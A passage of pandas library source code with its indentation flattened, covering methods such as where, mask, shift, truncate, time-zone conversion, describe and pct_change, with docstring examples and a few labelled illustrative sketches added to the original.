>>> s = pd.Series(range(5))
>>> s.where(s > 0)
0 NaN
1 1.0
2 2.0
3 3.0
4 4.0
>>> s.mask(s > 0)
0 0.0
1 NaN
2 NaN
3 NaN
4 NaN
>>> s.where(s > 1, 10)
0 10.0
1 10.0
2 2.0
3 3.0
4 4.0
>>> df = pd.DataFrame(np.arange(10).reshape(-1, 2), columns=['A', 'B'])
>>> m = df %% 3 == 0
>>> df.where(m, -df)
A B
0 0 -1
1 -2 3
2 -4 -5
3 6 -7
4 -8 9
>>> df.where(m, -df) == np.where(m, df, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
>>> df.where(m, -df) == df.mask(~m, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
See Also
--------
:func:`DataFrame.%(name_other)s`
""")
@Appender(_shared_docs['where'] % dict(_shared_doc_kwargs, cond="True",
cond_rev="False", name='where',
name_other='mask'))
def where(self, cond, other=np.nan, inplace=False, axis=None, level=None,
errors='raise', try_cast=False, raise_on_error=None):
if raise_on_error is not None:
warnings.warn(
"raise_on_error is deprecated in "
"favor of errors='raise|ignore'",
FutureWarning, stacklevel=2)
if raise_on_error:
errors = 'raise'
else:
errors = 'ignore'
other = com._apply_if_callable(other, self)
return self._where(cond, other, inplace, axis, level,
errors=errors, try_cast=try_cast)
@Appender(_shared_docs['where'] % dict(_shared_doc_kwargs, cond="False",
cond_rev="True", name='mask',
name_other='where'))
def mask(self, cond, other=np.nan, inplace=False, axis=None, level=None,
errors='raise', try_cast=False, raise_on_error=None):
if raise_on_error is not None:
warnings.warn(
"raise_on_error is deprecated in "
"favor of errors='raise|ignore'",
FutureWarning, stacklevel=2)
if raise_on_error:
errors = 'raise'
else:
errors = 'ignore'
inplace = validate_bool_kwarg(inplace, 'inplace')
cond = com._apply_if_callable(cond, self)
return self.where(~cond, other=other, inplace=inplace, axis=axis,
level=level, try_cast=try_cast,
errors=errors)
_shared_docs['shift'] = ("""
Shift index by desired number of periods with an optional time freq
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
freq : DateOffset, timedelta, or time rule string, optional
Increment to use from the tseries module or time rule (e.g. 'EOM').
See Notes.
axis : %(axes_single_arg)s
Notes
-----
If freq is specified then the index values are shifted but the data
is not realigned. That is, use freq if you would like to extend the
index when shifting and preserve the original data.
Returns
-------
shifted : %(klass)s
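Examples
--------
A brief illustrative example on a constructed Series (expected
output shown; vacated positions are filled with NaN):
>>> s = pd.Series([10, 20, 30])
>>> s.shift(1)
0     NaN
1    10.0
2    20.0
dtype: float64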
""")
@Appender(_shared_docs['shift'] % _shared_doc_kwargs)
def shift(self, periods=1, freq=None, axis=0):
if periods == 0:
return self
block_axis = self._get_block_manager_axis(axis)
if freq is None:
new_data = self._data.shift(periods=periods, axis=block_axis)
else:
return self.tshift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def slice_shift(self, periods=1, axis=0):
"""
Equivalent to `shift` without copying data. The shifted data will
not include the dropped periods and the shifted axis will be smaller
than the original.
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
Notes
-----
While the `slice_shift` is faster than `shift`, you may pay for it
later during alignment.
Returns
-------
shifted : same type as caller
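Examples
--------
A brief illustrative example on a constructed Series (expected
output shown; the shifted-off row is dropped rather than filled with
NaN, so the result is shorter than the input):
>>> s = pd.Series([1, 2, 3, 4])
>>> s.slice_shift(1)
1    1
2    2
3    3
dtype: int64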
"""
if periods == 0:
return self
if periods > 0:
vslicer = slice(None, -periods)
islicer = slice(periods, None)
else:
vslicer = slice(-periods, None)
islicer = slice(None, periods)
new_obj = self._slice(vslicer, axis=axis)
shifted_axis = self._get_axis(axis)[islicer]
new_obj.set_axis(shifted_axis, axis=axis, inplace=True)
return new_obj.__finalize__(self)
def tshift(self, periods=1, freq=None, axis=0):
"""
Shift the time index, using the index's frequency if available.
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
freq : DateOffset, timedelta, or time rule string, default None
Increment to use from the tseries module or time rule (e.g. 'EOM')
axis : int or basestring
Corresponds to the axis that contains the Index
Notes
-----
If freq is not specified then tries to use the freq or inferred_freq
attributes of the index. If neither of those attributes exist, a
ValueError is thrown
Returns
-------
shifted : NDFrame
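Examples
--------
A small illustrative example on a constructed Series with a daily
DatetimeIndex (expected output shown; only the index is shifted, the
data is unchanged):
>>> idx = pd.date_range('2018-01-01', periods=3, freq='D')
>>> s = pd.Series([1, 2, 3], index=idx)
>>> s.tshift(1)
2018-01-02    1
2018-01-03    2
2018-01-04    3
Freq: D, dtype: int64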
"""
index = self._get_axis(axis)
if freq is None:
freq = getattr(index, 'freq', None)
if freq is None:
freq = getattr(index, 'inferred_freq', None)
if freq is None:
msg = 'Freq was not given and was not set in the index'
raise ValueError(msg)
if periods == 0:
return self
if isinstance(freq, string_types):
freq = to_offset(freq)
block_axis = self._get_block_manager_axis(axis)
if isinstance(index, PeriodIndex):
orig_freq = to_offset(index.freq)
if freq == orig_freq:
new_data = self._data.copy()
new_data.axes[block_axis] = index.shift(periods)
else:
msg = ('Given freq %s does not match PeriodIndex freq %s' %
(freq.rule_code, orig_freq.rule_code))
raise ValueError(msg)
else:
new_data = self._data.copy()
new_data.axes[block_axis] = index.shift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def truncate(self, before=None, after=None, axis=None, copy=True):
"""
Truncate a Series or DataFrame before and after some index value.
This is a useful shorthand for boolean indexing based on index
values above or below certain thresholds.
Parameters
----------
before : date, string, int
Truncate all rows before this index value.
after : date, string, int
Truncate all rows after this index value.
axis : {0 or 'index', 1 or 'columns'}, optional
Axis to truncate. Truncates the index (rows) by default.
copy : boolean, default is True
Return a copy of the truncated section.
Returns
-------
type of caller
The truncated Series or DataFrame.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by label.
DataFrame.iloc : Select a subset of a DataFrame by position.
Notes
-----
If the index being truncated contains only datetime values,
`before` and `after` may be specified as strings instead of
Timestamps.
Examples
--------
>>> df = pd.DataFrame({'A': ['a', 'b', 'c', 'd', 'e'],
... 'B': ['f', 'g', 'h', 'i', 'j'],
... 'C': ['k', 'l', 'm', 'n', 'o']},
... index=[1, 2, 3, 4, 5])
>>> df
A B C
1 a f k
2 b g l
3 c h m
4 d i n
5 e j o
>>> df.truncate(before=2, after=4)
A B C
2 b g l
3 c h m
4 d i n
The columns of a DataFrame can be truncated.
>>> df.truncate(before="A", after="B", axis="columns")
A B
1 a f
2 b g
3 c h
4 d i
5 e j
For Series, only rows can be truncated.
>>> df['A'].truncate(before=2, after=4)
2 b
3 c
4 d
Name: A, dtype: object
The index values in ``truncate`` can be datetimes or string
dates.
>>> dates = pd.date_range('2016-01-01', '2016-02-01', freq='s')
>>> df = pd.DataFrame(index=dates, data={'A': 1})
>>> df.tail()
A
2016-01-31 23:59:56 1
2016-01-31 23:59:57 1
2016-01-31 23:59:58 1
2016-01-31 23:59:59 1
2016-02-01 00:00:00 1
>>> df.truncate(before=pd.Timestamp('2016-01-05'),
... after=pd.Timestamp('2016-01-10')).tail()
A
2016-01-09 23:59:56 1
2016-01-09 23:59:57 1
2016-01-09 23:59:58 1
2016-01-09 23:59:59 1
2016-01-10 00:00:00 1
Because the index is a DatetimeIndex containing only dates, we can
specify `before` and `after` as strings. They will be coerced to
Timestamps before truncation.
>>> df.truncate('2016-01-05', '2016-01-10').tail()
A
2016-01-09 23:59:56 1
2016-01-09 23:59:57 1
2016-01-09 23:59:58 1
2016-01-09 23:59:59 1
2016-01-10 00:00:00 1
Note that ``truncate`` assumes a 0 value for any unspecified time
component (midnight). This differs from partial string slicing, which
returns any partially matching dates.
>>> df.loc['2016-01-05':'2016-01-10', :].tail()
A
2016-01-10 23:59:55 1
2016-01-10 23:59:56 1
2016-01-10 23:59:57 1
2016-01-10 23:59:58 1
2016-01-10 23:59:59 1
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
# GH 17935
# Check that index is sorted
if not ax.is_monotonic_increasing and not ax.is_monotonic_decreasing:
raise ValueError("truncate requires a sorted index")
# if we have a date index, convert to dates, otherwise
# treat like a slice
if ax.is_all_dates:
from pandas.core.tools.datetimes import to_datetime
before = to_datetime(before)
after = to_datetime(after)
if before is not None and after is not None:
if before > after:
raise ValueError('Truncate: %s must be after %s' %
(after, before))
slicer = [slice(None, None)] * self._AXIS_LEN
slicer[axis] = slice(before, after)
result = self.loc[tuple(slicer)]
if isinstance(ax, MultiIndex):
setattr(result, self._get_axis_name(axis),
ax.truncate(before, after))
if copy:
result = result.copy()
return result
def tz_convert(self, tz, axis=0, level=None, copy=True):
"""
Convert tz-aware axis to target time zone.
Parameters
----------
tz : string or pytz.timezone object
axis : the axis to convert
level : int, str, default None
If axis is a MultiIndex, convert a specific level. Otherwise
must be None
copy : boolean, default True
Also make a copy of the underlying data
Returns
-------
Raises
------
TypeError
If the axis is tz-naive.
"""
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
def _tz_convert(ax, tz):
if not hasattr(ax, 'tz_convert'):
if len(ax) > 0:
ax_name = self._get_axis_name(axis)
raise TypeError('%s is not a valid DatetimeIndex or '
'PeriodIndex' % ax_name)
else:
ax = DatetimeIndex([], tz=tz)
else:
ax = ax.tz_convert(tz)
return ax
# if a level is given it must be a MultiIndex level or
# equivalent to the axis name
if isinstance(ax, MultiIndex):
level = ax._get_level_number(level)
new_level = _tz_convert(ax.levels[level], tz)
ax = ax.set_levels(new_level, level=level)
else:
if level not in (None, 0, ax.name):
raise ValueError("The level {0} is not valid".format(level))
ax = _tz_convert(ax, tz)
result = self._constructor(self._data, copy=copy)
result.set_axis(ax, axis=axis, inplace=True)
return result.__finalize__(self)
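# Added illustrative sketch (not part of the original pandas source):
# tz_convert only re-labels an already tz-aware index in another zone; the
# underlying instants are unchanged. Zone names assume pytz is available.
import pandas as pd
_utc = pd.Series([1.0],
                 index=pd.date_range('2018-01-01 12:00', periods=1, tz='UTC'))
_eastern = _utc.tz_convert('US/Eastern')
assert _eastern.index[0].hour == 7    # 12:00 UTC is 07:00 EST in January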
def tz_localize(self, tz, axis=0, level=None, copy=True,
ambiguous='raise'):
"""
Localize tz-naive TimeSeries to target time zone.
Parameters
----------
tz : string or pytz.timezone object
axis : the axis to localize
level : int, str, default None
If axis is a MultiIndex, localize a specific level. Otherwise
must be None
copy : boolean, default True
Also make a copy of the underlying data
ambiguous : 'infer', bool-ndarray, 'NaT', default 'raise'
- 'infer' will attempt to infer fall dst-transition hours based on
order
- bool-ndarray where True signifies a DST time, False designates
a non-DST time (note that this flag is only applicable for
ambiguous times)
- 'NaT' will return NaT where there are ambiguous times
- 'raise' will raise an AmbiguousTimeError if there are ambiguous
times
Returns
-------
Raises
------
TypeError
If the TimeSeries is tz-aware and tz is not None.
"""
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
def _tz_localize(ax, tz, ambiguous):
if not hasattr(ax, 'tz_localize'):
if len(ax) > 0:
ax_name = self._get_axis_name(axis)
raise TypeError('%s is not a valid DatetimeIndex or '
'PeriodIndex' % ax_name)
else:
ax = DatetimeIndex([], tz=tz)
else:
ax = ax.tz_localize(tz, ambiguous=ambiguous)
return ax
# if a level is given it must be a MultiIndex level or
# equivalent to the axis name
if isinstance(ax, MultiIndex):
level = ax._get_level_number(level)
new_level = _tz_localize(ax.levels[level], tz, ambiguous)
ax = ax.set_levels(new_level, level=level)
else:
if level not in (None, 0, ax.name):
raise ValueError("The level {0} is not valid".format(level))
ax = _tz_localize(ax, tz, ambiguous)
result = self._constructor(self._data, copy=copy)
result.set_axis(ax, axis=axis, inplace=True)
return result.__finalize__(self)
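# Added illustrative sketch (not part of the original pandas source):
# tz_localize attaches a zone to a tz-naive index; converting to another
# zone afterwards is a separate tz_convert call.
import pandas as pd
_naive = pd.Series([1.0], index=pd.date_range('2018-01-01 12:00', periods=1))
_aware = _naive.tz_localize('UTC')
assert _naive.index.tz is None and _aware.index.tz is not None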
# ----------------------------------------------------------------------
# Numeric Methods
def abs(self):
"""
Return a Series/DataFrame with absolute numeric value of each element.
This function only applies to elements that are all numeric.
Returns
-------
abs
Series/DataFrame containing the absolute value of each element.
Notes
-----
For ``complex`` inputs, ``1.2 + 1j``, the absolute value is
:math:`\\sqrt{ a^2 + b^2 }`.
Examples
--------
Absolute numeric values in a Series.
>>> s = pd.Series([-1.10, 2, -3.33, 4])
>>> s.abs()
0 1.10
1 2.00
2 3.33
3 4.00
dtype: float64
Absolute numeric values in a Series with complex numbers.
>>> s = pd.Series([1.2 + 1j])
>>> s.abs()
0 1.56205
dtype: float64
Absolute numeric values in a Series with a Timedelta element.
>>> s = pd.Series([pd.Timedelta('1 days')])
>>> s.abs()
0 1 days
dtype: timedelta64[ns]
Select rows with data closest to certain value using argsort (from
`StackOverflow <https://stackoverflow.com/a/17758115>`__).
>>> df = pd.DataFrame({
... 'a': [4, 5, 6, 7],
... 'b': [10, 20, 30, 40],
... 'c': [100, 50, -30, -50]
... })
>>> df
a b c
0 4 10 100
1 5 20 50
2 6 30 -30
3 7 40 -50
>>> df.loc[(df.c - 43).abs().argsort()]
a b c
1 5 20 50
0 4 10 100
2 6 30 -30
3 7 40 -50
See Also
--------
numpy.absolute : calculate the absolute value element-wise.
"""
return np.abs(self)
def describe(self, percentiles=None, include=None, exclude=None):
"""
Generates descriptive statistics that summarize the central tendency,
dispersion and shape of a dataset's distribution, excluding
``NaN`` values.
Analyzes both numeric and object series, as well
as ``DataFrame`` column sets of mixed data types. The output
will vary depending on what is provided. Refer to the notes
below for more detail.
Parameters
----------
percentiles : list-like of numbers, optional
The percentiles to include in the output. All should
fall between 0 and 1. The default is
``[.25, .5, .75]``, which returns the 25th, 50th, and
75th percentiles.
include : 'all', list-like of dtypes or None (default), optional
A white list of data types to include in the result. Ignored
for ``Series``. Here are the options:
- 'all' : All columns of the input will be included in the output.
- A list-like of dtypes : Limits the results to the
provided data types.
To limit the result to numeric types submit
``numpy.number``. To limit it instead to object columns submit
the ``numpy.object`` data type. Strings
can also be used in the style of
``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To
select pandas categorical columns, use ``'category'``
- None (default) : The result will include all numeric columns.
exclude : list-like of dtypes or None (default), optional
A black list of data types to omit from the result. Ignored
for ``Series``. Here are the options:
- A list-like of dtypes : Excludes the provided data types
from the result. To exclude numeric types submit
``numpy.number``. To exclude object columns submit the data
type ``numpy.object``. Strings can also be used in the style of
``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To
exclude pandas categorical columns, use ``'category'``
- None (default) : The result will exclude nothing.
Returns
-------
summary: Series/DataFrame of summary statistics
Notes
-----
For numeric data, the result's index will include ``count``,
``mean``, ``std``, ``min``, ``max`` as well as lower, ``50`` and
upper percentiles. By default the lower percentile is ``25`` and the
upper percentile is ``75``. The ``50`` percentile is the
same as the median.
For object data (e.g. strings or timestamps), the result's index
will include ``count``, ``unique``, ``top``, and ``freq``. The ``top``
is the most common value. The ``freq`` is the most common value's
frequency. Timestamps also include the ``first`` and ``last`` items.
If multiple object values have the highest count, then the
``count`` and ``top`` results will be arbitrarily chosen from
among those with the highest count.
For mixed data types provided via a ``DataFrame``, the default is to
return only an analysis of numeric columns. If the dataframe consists
only of object and categorical data without any numeric columns, the
default is to return an analysis of both the object and categorical
columns. If ``include='all'`` is provided as an option, the result
will include a union of attributes of each type.
The `include` and `exclude` parameters can be used to limit
which columns in a ``DataFrame`` are analyzed for the output.
The parameters are ignored when analyzing a ``Series``.
Examples
--------
Describing a numeric ``Series``.
>>> s = pd.Series([1, 2, 3])
>>> s.describe()
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
dtype: float64
Describing a categorical ``Series``.
>>> s = pd.Series(['a', 'a', 'b', 'c'])
>>> s.describe()
count 4
unique 3
top a
freq 2
dtype: object
Describing a timestamp ``Series``.
>>> s = pd.Series([
... np.datetime64("2000-01-01"),
... np.datetime64("2010-01-01"),
... np.datetime64("2010-01-01")
... ])
>>> s.describe()
count 3
unique 2
top 2010-01-01 00:00:00
freq 2
first 2000-01-01 00:00:00
last 2010-01-01 00:00:00
dtype: object
Describing a ``DataFrame``. By default only numeric fields
are returned.
>>> df = pd.DataFrame({ 'object': ['a', 'b', 'c'],
... 'numeric': [1, 2, 3],
... 'categorical': pd.Categorical(['d','e','f'])
... })
>>> df.describe()
numeric
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Describing all columns of a ``DataFrame`` regardless of data type.
>>> df.describe(include='all')
categorical numeric object
count 3 3.0 3
unique 3 NaN 3
top f NaN c
freq 1 NaN 1
mean NaN 2.0 NaN
std NaN 1.0 NaN
min NaN 1.0 NaN
25% NaN 1.5 NaN
50% NaN 2.0 NaN
75% NaN 2.5 NaN
max NaN 3.0 NaN
Describing a column from a ``DataFrame`` by accessing it as
an attribute.
>>> df.numeric.describe()
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Name: numeric, dtype: float64
Including only numeric columns in a ``DataFrame`` description.
>>> df.describe(include=[np.number])
numeric
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Including only string columns in a ``DataFrame`` description.
>>> df.describe(include=[np.object])
object
count 3
unique 3
top c
freq 1
Including only categorical columns from a ``DataFrame`` description.
>>> df.describe(include=['category'])
categorical
count 3
unique 3
top f
freq 1
Excluding numeric columns from a ``DataFrame`` description.
>>> df.describe(exclude=[np.number])
categorical object
count 3 3
unique 3 3
top f c
freq 1 1
Excluding object columns from a ``DataFrame`` description.
>>> df.describe(exclude=[np.object])
categorical numeric
count 3 3.0
unique 3 NaN
top f NaN
freq 1 NaN
mean NaN 2.0
std NaN 1.0
min NaN 1.0
25% NaN 1.5
50% NaN 2.0
75% NaN 2.5
max NaN 3.0
See Also
--------
DataFrame.count
DataFrame.max
DataFrame.min
DataFrame.mean
DataFrame.std
DataFrame.select_dtypes
"""
if self.ndim >= 3:
msg = "describe is not implemented on Panel objects."
raise NotImplementedError(msg)
elif self.ndim == 2 and self.columns.size == 0:
raise ValueError("Cannot describe a DataFrame without columns")
if percentiles is not None:
# explicit conversion of `percentiles` to list
percentiles = list(percentiles)
# get them all to be in [0, 1]
self._check_percentile(percentiles)
# median should always be included
if 0.5 not in percentiles:
percentiles.append(0.5)
percentiles = np.asarray(percentiles)
else:
percentiles = np.array([0.25, 0.5, 0.75])
# sort and check for duplicates
unique_pcts = np.unique(percentiles)
if len(unique_pcts) < len(percentiles):
raise ValueError("percentiles cannot contain duplicates")
percentiles = unique_pcts
formatted_percentiles = format_percentiles(percentiles)
def describe_numeric_1d(series):
stat_index = (['count', 'mean', 'std', 'min'] +
formatted_percentiles + ['max'])
d = ([series.count(), series.mean(), series.std(), series.min()] +
[series.quantile(x) for x in percentiles] + [series.max()])
return pd.Series(d, index=stat_index, name=series.name)
def describe_categorical_1d(data):
names = ['count', 'unique']
objcounts = data.value_counts()
count_unique = len(objcounts[objcounts != 0])
result = [data.count(), count_unique]
if result[1] > 0:
top, freq = objcounts.index[0], objcounts.iloc[0]
if is_datetime64_dtype(data):
asint = data.dropna().values.view('i8')
names += ['top', 'freq', 'first', 'last']
result += [tslib.Timestamp(top), freq,
tslib.Timestamp(asint.min()),
tslib.Timestamp(asint.max())]
else:
names += ['top', 'freq']
result += [top, freq]
return pd.Series(result, index=names, name=data.name)
def describe_1d(data):
if is_bool_dtype(data):
return describe_categorical_1d(data)
elif is_numeric_dtype(data):
return describe_numeric_1d(data)
elif is_timedelta64_dtype(data):
return describe_numeric_1d(data)
else:
return describe_categorical_1d(data)
if self.ndim == 1:
return describe_1d(self)
elif (include is None) and (exclude is None):
# when some numerics are found, keep only numerics
data = self.select_dtypes(include=[np.number])
if len(data.columns) == 0:
data = self
elif include == 'all':
if exclude is not None:
msg = "exclude must be None when include is 'all'"
raise ValueError(msg)
data = self
else:
data = self.select_dtypes(include=include, exclude=exclude)
ldesc = [describe_1d(s) for _, s in data.iteritems()]
# set a convenient order for rows
names = []
ldesc_indexes = sorted([x.index for x in ldesc], key=len)
for idxnames in ldesc_indexes:
for name in idxnames:
if name not in names:
names.append(name)
d = pd.concat(ldesc, join_axes=pd.Index([names]), axis=1)
d.columns = data.columns.copy()
return d
def _check_percentile(self, q):
"""Validate percentiles (used by describe and quantile)."""
msg = ("percentiles should all be in the interval [0, 1]. "
"Try {0} instead.")
q = np.asarray(q)
if q.ndim == 0:
if not 0 <= q <= 1:
raise ValueError(msg.format(q / 100.0))
else:
if not all(0 <= qs <= 1 for qs in q):
raise ValueError(msg.format(q / 100.0))
return q
_shared_docs['pct_change'] = """
Percentage change between the current and a prior element.
Computes the percentage change from the immediately previous row by
default. This is useful in comparing the percentage of change in a time
series of elements.
Parameters
----------
periods : int, default 1
Periods to shift for forming percent change.
fill_method : str, default 'pad'
How to handle NAs before computing percent changes.
limit : int, default None
The number of consecutive NAs to fill before stopping.
freq : DateOffset, timedelta, or offset alias string, optional
Increment to use from time series API (e.g. 'M' or BDay()).
**kwargs
Additional keyword arguments are passed into
`DataFrame.shift` or `Series.shift`.
Returns
-------
chg : Series or DataFrame
The same type as the calling object.
See Also
--------
Series.diff : Compute the difference of two elements in a Series.
DataFrame.diff : Compute the difference of two elements in a DataFrame.
Series.shift : Shift the index by some number of periods.
DataFrame.shift : Shift the index by some number of periods.
Examples
--------
**Series**
>>> s = pd.Series([90, 91, 85])
>>> s
0 90
1 91
2 85
dtype: int64
>>> s.pct_change()
0 NaN
1 0.011111
2 -0.065934
dtype: float64
>>> s.pct_change(periods=2)
0 NaN
1 NaN
2 -0.055556
dtype: float64
See the percentage change in a Series where filling NAs with last
valid observation forward to next valid.
>>> s = pd.Series([90, 91, None, 85])
>>> s
0 90.0
1 91.0
2 NaN
3 85.0
dtype: float64
>>> s.pct_change(fill_method='ffill')
0 NaN
1 0.011111
2 0.000000
3 -0.065934
dtype: float64
**DataFrame**
Percentage change in French franc, Deutsche Mark, and Italian lira from
1980-01-01 to 1980-03-01.
>>> df = pd.DataFrame({
... 'FR': [4.0405, 4.0963, 4.3149],
... 'GR': [1.7246, 1.7482, 1.8519],
... 'IT': [804.74, 810.01, 860.13]},
... index=['1980-01-01', '1980-02-01', '1980-03-01'])
>>> df
FR GR IT
1980-01-01 4.0405 1.7246 804.74
1980-02-01 4.0963 1.7482 810.01
1980-03-01 4.3149 1.8519 860.13
>>> df.pct_change()
FR GR IT
1980-01-01 NaN NaN NaN
1980-02-01 0.013810 0.013684 0.006549
1980-03-01 0.053365 0.059318 0.061876
Percentage of change in GOOG and APPL stock volume. Shows computing
the percentage change between columns.
>>> df = pd.DataFrame({
... '2016': [1769950, 30586265],
... '2015': [1500923, 40912316],
... '2014': [1371819, 41403351]},
... index=['GOOG', 'APPL'])
>>> df
2016 2015 2014
GOOG 1769950 1500923 1371819
APPL 30586265 40912316 41403351
>>> df.pct_change(axis='columns')
2016 2015 2014
GOOG NaN -0.151997 -0.086016
APPL NaN 0.337604 0.012002
"""
@Appender(_shared_docs['pct_change'] % _shared_doc_kwargs)
def pct_change(self, periods=1, fill_method='pad', limit=None, freq=None,
**kwargs):
# TODO: Not sure if above is correct - need someone to confirm.
axis = self._get_axis_number(kwargs.pop('axis', self._stat_axis_name))
if fill_method is None:
data = self
else:
data = self.fillna(method=fill_method, limit=limit, axis=axis)
rs = (data.div(data.shift(periods=periods, freq=freq, axis=axis,
**kwargs)) - 1)
rs = rs.reindex_like(data)
if freq is None:
mask = isna(com._values_from_object(data))
np.putmask(rs.values, mask, np.nan)
return rs
def _agg_by_level(self, name, axis=0, level=0, skipna=True, **kwargs):
grouped = self.groupby(level=level, axis=axis, sort=False)
if hasattr(grouped, name) and skipna:
return getattr(grouped, name)(**kwargs)
axis = self._get_axis_number(axis)
method = getattr(type(self), name)
applyf = lambda x: method(x, axis=axis, skipna=skipna, **kwargs)
return grouped.aggregate(applyf)
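# Added illustrative sketch (not part of the original pandas source):
# level-based reductions such as df.sum(level=0) are routed through the
# groupby(level=...) call that _agg_by_level wraps (behaviour as of this
# pandas version).
import pandas as pd
_mi = pd.MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1)])
_mdf = pd.DataFrame({'x': [1, 2, 3]}, index=_mi)
assert _mdf.sum(level=0)['x'].tolist() == [3, 3]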
@classmethod
def _add_numeric_operations(cls):
"""Add the operations to the cls; evaluate the doc strings again"""
axis_descr, name, name2 = _doc_parms(cls)
cls.any = _make_logical_function(
cls, 'any', name, name2, axis_descr,
_any_desc, nanops.nanany, _any_examples, _any_see_also)
cls.all = _make_logical_function(
cls, 'all', name, name2, axis_descr, _all_doc,
nanops.nanall, _all_examples, _all_see_also)
@Substitution(outname='mad',
desc="Return the mean absolute deviation of the values "
"for the requested axis",
name1=name, name2=name2, axis_descr=axis_descr,
min_count='', examples='')
@Appender(_num_doc)
def mad(self, axis=None, skipna=None, level=None):
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level('mad', axis=axis, level=level,
skipna=skipna)
data = self._get_numeric_data()
if axis == 0:
demeaned = data - data.mean(axis=0)
else:
demeaned = data.sub(data.mean(axis=1), axis=0)
return np.abs(demeaned).mean(axis=axis, skipna=skipna)
cls.mad = mad
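# Added illustrative sketch (not part of the original pandas source): mad()
# is the mean of the absolute deviations from the mean, exactly as the
# demean/abs/mean steps above compute it.
import pandas as pd
_vals = pd.Series([1.0, 2.0, 3.0, 4.0])
# mean is 2.5, absolute deviations are [1.5, 0.5, 0.5, 1.5], so mad is 1.0
assert _vals.mad() == 1.0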
cls.sem = _make_stat_function_ddof(
cls, 'sem', name, name2, axis_descr,
"Return unbiased standard error of the mean over requested "
"axis.\n\nNormalized by N-1 by default. This can be changed "
"using the ddof argument",
nanops.nansem)
cls.var = _make_stat_function_ddof(
cls, 'var', name, name2, axis_descr,
"Return unbiased variance over requested axis.\n\nNormalized by "
"N-1 by default. This can be changed using the ddof argument",
nanops.nanvar)
cls.std = _make_stat_function_ddof(
cls, 'std', name, name2, axis_descr,
"Return sample standard deviation over requested axis."
"\n\nNormalized by N-1 by default. This can be changed using the "
"ddof argument",
nanops.nanstd)
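# Added illustrative sketch (not part of the original pandas source):
# sem/var/std all take ddof; the default ddof=1 is the unbiased (N-1)
# estimator, ddof=0 the population formula.
import pandas as pd
_x = pd.Series([1.0, 2.0, 3.0])
assert _x.var() == 1.0                 # sum of squared deviations 2 / (3 - 1)
assert abs(_x.var(ddof=0) - 2.0 / 3.0) < 1e-12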
@Substitution(outname='compounded',
desc="Return the compound percentage of the values for "
"the requested axis", name1=name, name2=name2,
axis_descr=axis_descr,
min_count='', examples='')
@Appender(_num_doc)
def compound(self, axis=None, skipna=None, level=None):
if skipna is None:
skipna = True
return (1 + self).prod(axis=axis, skipna=skipna, level=level) - 1
cls.compound = compound
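# Added illustrative sketch (not part of the original pandas source):
# compound() treats each value as a fractional return and chains them,
# (1 + r1) * (1 + r2) * ... - 1, exactly as the one-liner above does
# (the method exists in this version of pandas).
import pandas as pd
_returns = pd.Series([0.10, 0.10])
assert abs(_returns.compound() - 0.21) < 1e-12   # 1.1 * 1.1 - 1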
cls.cummin = _make_cum_function(
cls, 'cummin', name, name2, axis_descr, "minimum",
lambda y, axis: np.minimum.accumulate(y, axis), "min",
np.inf, np.nan, _cummin_examples)
cls.cumsum = _make_cum_function(
cls, 'cumsum', name, name2, axis_descr, "sum",
lambda y, axis: y.cumsum(axis), "sum", 0.,
np.nan, _cumsum_examples)
cls.cumprod = _make_cum_function(
cls, 'cumprod', name, name2, axis_descr, "product",
lambda y, axis: y.cumprod(axis), "prod", 1.,
np.nan, _cumprod_examples)
cls.cummax = _make_cum_function(
cls, 'cummax', name, name2, axis_descr, "maximum",
lambda y, axis: np.maximum.accumulate(y, axis), "max",
-np.inf, np.nan, _cummax_examples)
cls.sum = _make_min_count_stat_function(
cls, 'sum', name, name2, axis_descr,
'Return the sum of the values for the requested axis',
nanops.nansum, _sum_examples)
cls.mean = _make_stat_function(
cls, 'mean', name, name2, axis_descr,
'Return the mean of the values for the requested axis',
nanops.nanmean)
cls.skew = _make_stat_function(
cls, 'skew', name, name2, axis_descr,
'Return unbiased skew over requested axis\nNormalized by N-1',
nanops.nanskew)
cls.kurt = _make_stat_function(
cls, 'kurt', name, name2, axis_descr,
"Return unbiased kurtosis over requested axis using Fisher's "
"definition of\nkurtosis (kurtosis of normal == 0.0). Normalized "
"by N-1\n",
nanops.nankurt)
cls.kurtosis = cls.kurt
cls.prod = _make_min_count_stat_function(
cls, 'prod', name, name2, axis_descr,
'Return the product of the values for the requested axis',
nanops.nanprod, _prod_examples)
cls.product = cls.prod
cls.median = _make_stat_function(
cls, 'median', name, name2, axis_descr,
'Return the median of the values for the requested axis',
nanops.nanmedian)
cls.max = _make_stat_function(
cls, 'max', name, name2, axis_descr,
"""This method returns the maximum of the values in the object.
If you want the *index* of the maximum, use ``idxmax``. This is
the equivalent of the ``numpy.ndarray`` method ``argmax``.""",
nanops.nanmax)
cls.min = _make_stat_function(
cls, 'min', name, name2, axis_descr,
"""This method returns the minimum of the values in the object.
If you want the *index* of the minimum, use ``idxmin``. This is
the equivalent of the ``numpy.ndarray`` method ``argmin``.""",
nanops.nanmin)
@classmethod
def _add_series_only_operations(cls):
"""Add the series only operations to the cls; evaluate the doc
strings again.
"""
axis_descr, name, name2 = _doc_parms(cls)
def nanptp(values, axis=0, skipna=True):
nmax = nanops.nanmax(values, axis, skipna)
nmin = nanops.nanmin(values, axis, skipna)
return nmax - nmin
cls.ptp = _make_stat_function(
cls, 'ptp', name, name2, axis_descr,
"""Returns the difference between the maximum value and the
minimum value in the object. This is the equivalent of the
